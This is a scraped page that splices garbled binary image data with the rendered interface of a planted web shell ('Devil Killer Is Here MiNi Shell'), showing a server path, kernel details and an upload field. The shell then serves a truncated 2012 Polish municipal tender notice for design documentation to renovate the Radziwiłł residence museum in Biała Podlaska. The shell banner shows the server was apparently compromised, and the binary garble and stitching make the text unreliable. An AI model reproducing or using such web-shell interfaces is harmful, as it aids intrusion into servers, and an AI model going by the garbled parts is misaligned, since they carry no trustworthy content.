JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/366340-N-2012.html

<p class="kh_header"><b>Biała Podlaska: OPRACOWANIE WIELOBRANŻOWEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ DLA INWESTYCJI PN. REWITALIZACJA REZYDENCJI RADZIWIŁŁÓW W BIAŁEJ PODLASKIEJ - SIEDZIBY MUZEUM POŁUDNIOWEGO PODLASIA</b><br>
<b>Numer ogłoszenia: 366340 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Biała Podlaska , ul. Marszałka Józefa Piłsudskiego 3, 21-500 Biała Podlaska, tel. 083 3416177, faks 083 3437064.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialapodlaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE WIELOBRANŻOWEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ DLA INWESTYCJI PN. REWITALIZACJA REZYDENCJI RADZIWIŁŁÓW W BIAŁEJ PODLASKIEJ - SIEDZIBY MUZEUM POŁUDNIOWEGO PODLASIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dotyczy sporządzenia projektów:
A)  Remontu i modernizacji budynku muzeum i szyi (projekt wielobranżowy z aranżacją wnętrz- bez elewacji Wieży bramnej). 

B)  Oficyny zachodniej (część budynku - pomieszczenia po BCK i wolne pomieszczenia) - projekt wielobranżowy z aranżacją wnętrz. 

C) Oficyny północno-zachodniej (elewacja, wymiana stolarki okiennej i drzwiowej, zewnętrzne  oświetlenie budynku z uwzględnieniem podświetlenia Wieży bramnej).
 
D) Kapliczki (dotyczy robót wewnętrznych - instalacji alarmowej, c.o.)  z aranżacją wnętrz.
 
E) Wieżyczki wschodniej (projekt wielobranżowy - roboty wewnętrzne remontowe budowlane,  instalacja elektryczna i co.) z aranżacją wnętrz.

F)  Wieżyczki zachodniej (roboty wewnętrzne) z aranżacją wnętrz.

F) Kordegardy i bramy wjazdowej ( projekt wielobranżowy, roboty wewnętrzne i zewnętrzne, elewacja, taras, brama wjazdowa itp.) z aranżacją wnętrz. 
G)  Nowoprojektowany budynek  przeznaczony na magazyn - projekt wielobranżowy.
1.1Uzyskania niezbędnych do projektowania opinii: konstrukcyjnej obiektu (tj.: więźby dachowej, stropów, ścian nośnych), oceny stanu technicznego podłoża (stopnia zawilgocenia i zasolenia murów) z  propozycją doboru (właściwej dla obiektu) metody osuszenia ścian i fundamentów wraz z doborem technologii robót i renowacyjnych przy elewacjach obiektu; sporządzenia kompleksowego (we wszystkich branżach) projektu budowlano-wykonawczego, jak również uzyskania niezbędnych decyzji i uzgodnień, w tym także konserwatorskich, spełniających warunki kompletnego wniosku o wydanie decyzji o pozwolenie na budowę, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznej wykonania i odbioru robót budowlanych, informacji dotyczącej BIOZ. Projekty wykonawcze w zakresie adaptacji i modernizacji wnętrz na potrzeby wystawienniczo - magazynowo - techniczne powinny uwzględniać dostosowanie budynku do wymogów ochrony p.poż oraz innych wynikających z odpowiednich wymogów 
i rozporządzeń w tym przez Narodowy Instytut Muzealnictwa i Ochrony Zabytków.
1.2	W skład opracowania wchodzi również sporządzenie:       
1.2.1	Przedmiarów robót z podziałem na branże wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389 z 2004r.), przy czym przedmiary robót wykonać w rozbiciu na poszczególne zadania.

1.2.2 Kosztorysów inwestorskich wykonanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389 z 2004r.) - w rozbiciu na poszczególne zadania.

1.2.3. Specyfikacji technicznych odbioru i wykonania robót budowlanych, wykonana zgodnie z Rozporządzeniem  Ministra  Infrastruktury  z  dnia 2 września 2004r. w  sprawie szczegółowego zakresu i formy dokumentacji projektowej.

1.2.4  Informacji   dotyczących   BIOZ   wykonanej   zgodnie  z   Rozporządzeniem   Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa  i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 poz. 1126).
Wszystkie opracowania należy przygotować w  6 - ciu egzemplarzach oraz dwa komplety na płytach DVD, (kosztorys inwestorski - ath, pdf, word 2 egz.), specyfikacje techniczne wykonania i odbioru robót w formacie Word na każde zadanie oddzielnie 2 egz.

Dokumentację  projektową  należy  uzgodnić  z Zamawiającym, Wojewódzkim Urzędem Ochrony Zabytków w Lublinie, Delegatura  w  Białej Podlaskiej,  rzeczoznawcami w zakresie p.poż., sanepid, bhp oraz innymi wynikającymi  z  przepisów  szczegółowych w tym przez Narodowy Instytut Muzealnictwa i Ochrony Zabytków.

1.3  Ogólne właściwości funkcjonalno-użytkowe muzeum
     Budynek ma zapewnić pełnienie funkcji muzealnych (ekspozycja stała) i wystawowych (realizacja wystaw czasowych) wraz z zapleczem socjalno-sanitarnym oraz magazynami głównie ikon. Dla spełnienia tych funkcji budynek winien być wyposażony w system łączności i instalacji zapewniających prawidłowe funkcjonowanie muzeum - jako obiektu użyteczności publicznej. 

1.4  Bezpieczeństwo - muzeum
Zamawiający wymaga, aby obiekt był chroniony przez systemy sygnalizacji p.poż., włamania i napadów oraz System Telewizji Dozorowej. 

1.5.Teren
Ma spełniać następujące funkcje:
- zapewnienia dojść pieszych i dojazdów dla pojazdów obsługujących muzeum;
- zapewnienia dostępu do obiektu przez osoby poruszające się na wózkach inwalidzkich.

1.6 Szczegółowe właściwości funkcjonalno-użytkowe budynku muzeum
Budynek ma zapewnić pełnienie funkcji muzealnych (ekspozycja stała) i wystawowych (realizacja wystaw czasowych) oraz magazynów wraz z zapleczem socjalno-sanitarnym dla zwiedzających i personelu.

W planowanej inwestycji - Rewitalizacji rezydencji Radziwiłłów w Białej Podlaskiej - siedziby Muzeum południowego Podlasia - Muzeum ma pozostać głównym elementem, obiektem historycznym, spinającym całe założenie parkowe. Ma nadal pełnić funkcję ekspozycji stałej i czasowej poświęconej głównie ikonom. Konieczne jest zaprojektowaniei wykonanie toalet spełniających wszelkie normy i zgodnych z przepisami budowlanymi, szatni, a także przystosowanie muzeum dla niepełnosprawnych zwiedzających ( z parteru na I piętro). Zamawiający nie wskazuje miejsca na zaprojektowanie, szatni i windy dla niepełnosprawnych. Decyzję pozostawia projektantowi. Wymaga przedstawienia projektu koncepcyjnego i zatwierdzenia go przez Zamawiającego, Użytkownika i Konserwatora Zabytków.
Administracja muzeum, pomieszczenia dla pracowników powinny zostać przeniesione do budynku Oficyny Zachodniej. 

1.7  Wymagania zamawiającego w stosunku do przedmiotu zamówienia

1.7.1. Cechy obiektu dotyczące rozwiązań budowlano-konstrukcyjnych

Zamawiający wymaga aby projektowane elementy konstrukcyjne budynku miały zapewnioną trwałość nie mniejsza niż 50 lat. Sieci i uzbrojenie terenu powinny zapewnić użytkowanie w okresie nie krótszym niż 30 lat, a osprzęt i przybory instalacyjne powinny zapewnić sprawne funkcjonowanie w okresie co najmniej 15 lat.

1.7.1.2 Wymagania szczegółowe

a)	W odniesieniu do architektury
Cały budynek być zaprojektowany w sposób maksymalnie respektujący architekturę istniejącą i zgodnie ze sztuką konserwacji obiektów zabytkowych. 
W budynku należy zlokalizować toalety spełniające wszelkie normy  i zgodne z przepisami budowlanymi, szatnię, a także przystosować muzeum dla niepełnosprawnych zwiedzających. 
Zarówno projekt koncepcyjny jak i kompleksowa dokumentacja projektowa powinny być zatwierdzona przez Zamawiającego i Wojewódzki Urząd Ochrony Zabytków w Lublinie, Delegatura w Białej Podlaskiej. Projekty i opracowania muszą spełniać warunki wymagane przez Narodowy Instytut Muzealnictwa i Ochrony Zabytków.

b)	W odniesieniu do konstrukcji
W ramach prac przedprojektowych należy wykonać aktualną ekspertyzę konstrukcyjną obiektu(szyi) ( tj.: więźby dachowej, stropów, ścian nośnych ), ocenę stanu technicznego podłoża (stopnia zawilgocenia  i zasolenia murów) z  propozycją doboru (właściwej dla obiektu) metody osuszenia ścian i fundamentów. Przy pracach projektowych należy uwzględnić adaptację poddasza szyi na cele użytkowe lub magazynowe.
Elementy konstrukcyjne powinny być zaprojektowane w sposób zgodny z obowiązującymi normami, standardami materiałowymi oraz technicznymi. Elementy ślusarskie usytuowane na zewnątrz budynku winny być wykonane z materiałów odpornych na rdzę lub odpowiednio zakonserwowane.

c)	W odniesieniu do instalacji
Klimatyzacja i wentylacja - oba systemy winny być zintegrowane.
Celem tych instalacji ma być utrzymanie odpowiednich parametrów powietrza wewnątrz muzeum z uwagi na zabytkowe wyposażenie sal oraz obiektów przeznaczonych do ekspozycji (obrazy, tkaniny, meble, grafiki). Wloty i wyloty powietrza winny posiadać kształt i wygląd dostosowany do charakteru pomieszczeń i ogólnego poziomu jakościowego formułowanego dla danego pomieszczenia. Przewody winny być ukryte.
Instalacja elektryczna - ma być doprowadzona do każdego pomieszczenia. Oprócz oświetlenia w każdym pomieszczeniu winny być co najmniej 2 gniazda wtykowe lub w ilości wynikającej z funkcji szczególnych. Oświetlenie powinno być projektowane w oparciu 
o energooszczędne źródła światła. Na ekspozycji stałej planuje się rozmieszczenie w każdej sali żyrandoli lub oświetlenia uzupełniającego.
Instalacja c.o.- Zamawiający wymaga zaprojektowania modernizacji instalacji wewnętrznej c.o. Grzejniki płytowe pod oknami - stosować w odpowiednim standardzie estetycznym i w miarę neutralnym. System grzejników mieć zawory regulacyjne termostatyczne i musi współpracować z systemem wentylacji i klimatyzacji.
Instalacja wodna - orurowanie instalacji wodnych i cieplnych powinno być wykonane 
z materiałów trwałych (co najmniej 30 lat) np. miedź. Należy zaprojektować wewnętrzną instalację p.poż - hydrantową.
Instalacja kanalizacyjna - powinna być wykonana w orurowaniu z tworzywa sztucznego. Także poziomy kanalizacyjne mogą być wykonane z tworzywa. Zamawiający wymaga zapewnienia łatwej dostępności do oczyszczaczy i odcinków rewizyjnych.
Instalacje słaboprądowe - telefoniczna z centralą telefoniczną wspólną dla całego zespołu. Sieć telefoniczna zintegrowana z siecią istniejącą. W każdym pomieszczeniu należy zainstalować czujki p.poż. Na dachu syrena alarmowa. 
Instalacja p.poż. - projekt sieci wewnętrznej hydrantowej; projekt systemu wczesnej detekcji dymu z dźwiękowym systemem ostrzegawczym.
Instalacja alarmowa wraz z monitoringiem - zachowanie istniejącej instalacji z doposażeniem jej z podświetleniem na podczerwień oraz z uwzględnieniem ukrycia istniejących kabli w ścianach.

Projekt systemu kontroli dostępu (pomieszczenia magazynowe).

d)	W odniesieniu do aranżacji wnętrz

Projekt aranżacji wnętrz sal ekspozycyjnych, sal wystawienniczo - projekcyjnych, magazynowych, biurowych i innych. 
Gabloty - przeszklone, podświetlane, podstawy gablot z metalu lub wysezonowanego drewna malowanego nieaktywnymi chemicznie farbami. Zamawiający wymaga aby wszystkie gabloty pod względem konstrukcyjnym były wytrzymałe eksploatacyjnie, możliwy byłby ich transport w różnym położeniu. W zależności od typu gabloty, wewnętrzne podłogi, ściany muszą być wykonane w sposób umożliwiający zamocowanie do nich eksponatów przy pomocy uchwytów, które zostaną zespolone z płytą. W przypadku gablot stojących, konstrukcja podłogi musi zapewniać stabilne ustawienie eksponatów o wadze kilkudziesięciu kilogramów np. zbroi.
Wskazane jest aby gabloty stojące były wyposażone w podkręcane nóżki umożliwiające wyrównanie wysokości. Gabloty muszą być wyposażone w atestowane zamki zabezpieczające przed kradzieżą , tak aby niemożliwe było włamanie bez użycia siły. Konstrukcja gablot musi zapewniać  uszczelnienie uniemożliwiające przenikanie do wnętrza kurzu, insektów, owadów. Ścianki i klosze gablot muszą być wykonane z wysokogatunkowego szkła. Eksponaty zabytkowe eksponowane będą w przestrzennych gablotach wyposażony w system półek szklanych oraz oświetlenie górne (reflektorki LED z regulacją kąta świecenia), natomiast współczesne na otwartych podestach ekspozycyjnych z wbudowanym oświetleniem w kloszach powierzchni wystawienniczej, dodatkowo oświetlonych światłem ze źródeł zewnętrznych a w szczególności być wolne od emisji UV oraz zbytniej emisji ciepła. Konstrukcja gablot musi umożliwiać bezproblemową wymianę oświetlenia lub jego elementów. 
Projekt aranżacji wnętrz powinien uwzględniać również system zawieszania obrazów, manekinów itp. w salach wystawowych, a w pomieszczeniach biurowych biurek, szaf oraz innego wyposażenia. 
W projekcie należy wskazać kolorystykę ścian ( rodzaje farb),  rodzaje, materiał, kolorystykę i wykończenie mebli, aranżację okien, oświetlenia a także inne urządzenia składające się na wystrój wnętrz - uwzględniając planowane wyposażenie w budynkach objętych opracowaniem.
Propozycja rozmieszczenia materiałów wystawienniczych (między innymi: gablot, plansz, ekranów), punktów oświetlenia oraz środków przekazu multimedialnego;  powinna umożliwiać swobodne kształtowanie przestrzeni wystawienniczych oraz ich elastyczne dostosowywanie do aktualnych i przyszłych potrzeb sal wystawowych w których materiały wystawiennicze mają być wystawione;
Projekt - systemu magazynowania ikon.
Wykonanie wizualizacji przedmiotowego zadania - wizualizacja, w tym także komputerowa, wnętrz obiektów po realizacji inwestycji.

e)	W odniesieniu do wykończenia obiektu
Projekt winien zawierać standardowe elementy wykończenia - podłogi i ściany. Należy wymienić parkiety w złym stanie technicznym oraz posadzki (lastrykowe). Zastosowane we wnętrzach materiały powinny być trwałe, wysokiej jakości o odpowiednich atestach z dopuszczeniem do prac przy obiektach zabytkowych. Materiały winny harmonizować ze stylem i charakterem obiektu.
Należy przewidzieć zastosowanie docelowe rozwiązań materiałowych i detalu architektonicznego, które zostaną objęte specjalistycznym projektem wnętrz stylowych. Stolarka drzwiowa wewnętrzna w oparciu o istniejące formy z zastosowaniem współczesnych technologii. Należy zachować i poddać konserwacji oryginalną dobrą stolarkę drzwiową, 
w przypadku jej bardzo złego stanu technicznego dopuszcza się wymianę - odtworzenie, które należy przeprowadzić na wzór istniejących.

f)	W odniesieniu do zagospodarowania terenu
Należy respektować istniejący układ dojść i podjazdów wokół budynków. Zamawiający wymaga dostosowania dojść i podjazdów dla osób niepełnosprawnych. Do uzgodnienia i zaprojektowania pozostawia się technologie materiałowe.
Wykonanie wizualizacji przedmiotowego zadania - wizualizacji, w tym także komputerowa, obiektów z zewnątrz po realizacji inwestycji- dotyczy tych obiektów, dla których w ramach przedmiotowego zamówienia projektowane będą roboty zewnętrzne.
2.	CZEŚĆ INFORMACYJNA
Inwestor (Gmina Miejska w Białej Podlaskiej) oświadcza, że posiada prawa do dysponowania obiektem oraz gruntem na potrzeby projektowanych prac budowlano-modernizacyjnych. 
Dokumentację projektową należy opracować zgodnie z:
- Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego, Dz. U. Nr 202 poz. 2072 z dnia 
16 września 2004 r.
- Rozporządzenie Ministra Infrastruktury z dnia 22 kwietnia 2005 r. zmieniające rozporządzenie w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego, Dz. U. Nr 75 poz. 2075 z dnia 29 kwietnia 2005 r.
- Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane ( Dz. U. z 2010 r. , nr 243 poz. 1623 z późniejszymi zmianami) i wszystkich wydanych na jej podstawie aktów wykonawczych.
- Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków (Dz. U. z 2004 r. Nr 150 poz. 1579).

3.	Zakres prac projektowych do wykonania w ramach zamówienia:
Dokumentacja  projektowo - kosztorysowa dla inwestycji pod nazwą: Rewitalizacji rezydencji Radziwiłłów w Białej Podlaskiej - siedziby Muzeum Południowego Podlasia  powinna być wykonana dwufazowo:

I. prace przedprojektowe  (do uzgodnienia z Zamawiającym i Wojewódzkim  Konserwatorem  Zabytków, Delegatura w Białej Podlaskiej). 
Do prac przedprojektowych Zamawiający zalicza:
- wykonanie aktualnej ekspertyzy konstrukcyjnej obiektu ( tj.: więźby dachowej, stropów,    ścian nośnych ) wraz z serwisem fotograficznym - szyja,
- wykonanie oceny stanu technicznego podłoża (stopnia zawilgocenia i zasolenia murów) z propozycją doboru (właściwej dla obiektu) metody osuszenia ścian i fundamentów wraz z doborem technologii robót i renowacyjnych przy elewacjach obiektu - szyja.
- wykonanie koncepcji projektu remontu i modernizacji budynku muzeum wraz z ewentualnymi koniecznymi ekspertyzami.

II. projekt  budowlano-wykonawczy  obejmujący prace remontowo-konserwatorskie
i modernizacyjne we wszystkich obiektach w następującym układzie  branżowym:
- architektura i konstrukcja: remont konserwatorski elewacji (bez Wieży bramnej), wymiana stolarki okiennej (bez Wieży bramnej) i drzwiowej, wymiana parapetów, (stolarkę drzwiową dobrze zachowaną należy pozostawić i poddać konserwacji), wymiana pokrycia dachowego (szyja) na blachę miedzianą, dopuszcza się wymianę elementów więźby dachowej w złym stanie technicznym po uprzednim wykonaniu ekspertyzy konstrukcyjnej, zaprojektowanie toalet, szatni, windy dla zwiedzających w tym niepełnosprawnych;
- instalacje  elektryczne: oświetleniowa  i  gniazda  użytkowe,  odgromowa;
- instalacje  teletechniczne  (niskoprądowa):
a.  antywłamaniowa, alarmowa, system telewizji dozorowej
b.  p.poż.;
c.  sieć  strukturalna;
d. teleinformatyczna,  awaryjna,  telefoniczna;
        - instalacje  wod-kan;
        - instalacja  C.O. wentylacja  i  klimatyzacja;
        - przyłącza  wod-kan.  i  energetyczne do budynku projektowanego 
          ( magazyn zbiorów) .
4.	Dodatkowy zakres prac zawiera załącznik nr 1 do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.22.00.00-1, 74.22.21.00-2, 74.22.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 
trzech lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej  jedną usługę polegającą na wykonaniu dokumentacji projektowo-kosztorysowej remontu  budynku zabytkowego albo budynku znajdującego się w strefie objętej ochroną konserwatora zabytków o kubaturze nie mniejszej niż 4 000 m 3 wraz z uzyskaniem dla tej dokumentacji pozwolenia na budowę oraz  załączeniem dokumentu potwierdzającego, że usługa ta została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedstawi w załączniku nr 6 (wykaz osób), że dysponuje osobami posiadającymi uprawnienia budowlane do projektowania w następujących specjalnościach.:
1) architektonicznej - architekt posiadający uprawnienia do projektowania obiektów zabytkowych bez ograniczeń,
2) konstrukcyjno-budowlanej - konstruktor uprawnienia do projektowania bez     ograniczeń,
3) instalacji w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
4) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
5) telekomunikacyjnej w zakresie telekomunikacji przewodowej wraz z infrastruktura telekomunikacyjną,
W/w osoby muszą posiadać odpowiednie doświadczenie tj: każda z nich wykonała dokumentację projektowo-kosztorysową w swojej branży w okresie ostatnich trzech lat,  remontu  budynku zabytkowego albo budynku znajdującego się w strefie objętej ochroną konserwatora zabytków o kubaturze nie mniejszej niż 4 000 m 3 wraz z uzyskaniem dla tej branży pozwolenia na budowę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli:
1.	wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość co najmniej  100 000,00 PLN.
2.wykonawca wykaże, iż dysponuje środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu obrotowego lub promesą kredytową) w wysokości 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
